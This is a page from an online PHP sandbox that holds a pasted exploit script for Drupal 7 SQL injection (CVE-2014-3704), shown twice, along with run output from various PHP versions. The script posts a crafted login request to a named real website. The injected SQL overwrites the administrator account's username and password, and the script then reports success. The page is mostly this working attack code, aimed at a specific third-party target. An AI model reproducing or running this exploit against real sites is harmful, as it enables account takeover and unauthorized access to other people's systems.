3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>
based on A2DPr
Output for 5.4.34 - 5.6.28, 7.0.0 - 7.1.0
Notice: Use of undefined constant php - assumed 'php' in /in/boZOu on line 1
Output for hhvm-3.12.0
Fatal error: <?php directive must be followed by whitespace, newline, or EOF (Line: 1, Char: 5) syntax error, unexpected T_HH_ERROR, expecting $end in /in/boZOu on line 1
Process exited with code 255.
Output for hhvm-3.10.0

Process exited with code 153.
Output for 4.3.0 - 5.4.32
<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>